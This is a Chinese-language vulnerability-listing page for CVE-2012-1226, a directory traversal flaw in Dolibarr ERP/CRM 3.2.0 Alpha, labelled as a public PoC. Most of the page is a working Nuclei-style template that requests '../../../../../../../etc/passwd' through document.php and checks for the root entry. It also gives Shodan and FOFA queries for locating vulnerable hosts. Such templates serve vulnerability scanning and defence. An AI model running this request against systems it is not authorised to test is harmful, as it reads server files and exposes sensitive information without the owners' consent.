CVE-2012-1226: Dolibarr ERP/CRM 3.2 Alpha - Multiple Directory Traversal Vulnerabilities

日期: 2025-08-01 | 影响软件: Dolibarr ERP CRM | POC: 已公开

漏洞描述

Multiple directory traversal vulnerabilities in Dolibarr CMS 3.2.0 Alpha allow remote attackers to read arbitrary files and possibly execute arbitrary code via a .. (dot dot) in the (1) file parameter to document.php or (2) backtopage parameter in a create action to comm/action/fiche.php.

PoC代码[已公开]

id: CVE-2012-1226

info:
  name: Dolibarr ERP/CRM 3.2 Alpha - Multiple Directory Traversal Vulnerabilities
  author: daffainfo
  severity: high
  description: Multiple directory traversal vulnerabilities in Dolibarr CMS 3.2.0 Alpha allow remote attackers to read arbitrary files and possibly execute arbitrary code via a .. (dot dot) in the (1) file parameter to document.php or (2) backtopage parameter in a create action to comm/action/fiche.php.
  impact: |
    Successful exploitation of these vulnerabilities could allow an attacker to read arbitrary files from the server, potentially leading to unauthorized access or sensitive information disclosure.
  remediation: Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/36873
    - https://nvd.nist.gov/vuln/detail/CVE-2012-1226
    - http://www.vulnerability-lab.com/get_content.php?id=428
    - http://www.exploit-db.com/exploits/18480
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/73136
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
    cvss-score: 7.5
    cve-id: CVE-2012-1226
    cwe-id: CWE-22
    epss-score: 0.10327
    epss-percentile: 0.92913
    cpe: cpe:2.3:a:dolibarr:dolibarr_erp\/crm:3.2.0:alpha:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: dolibarr
    product: dolibarr_erp\/crm
    shodan-query: http.favicon.hash:440258421
    fofa-query: icon_hash=440258421
  tags: cve,cve2012,lfi,dolibarr,traversal,edb

http:
  - method: GET
    path:
      - "{{BaseURL}}/document.php?modulepart=project&file=../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a004730450221009479aa762c1cbdb8256fa8412df4302097c33e18d1a58900325eeaaa0397601d02205feefbb0264ce1c60d88bf35d7e34909b309dab0857f3edddf5a1053cf073f49:922c64590222798bb761d5b6d8e72950

相关漏洞推荐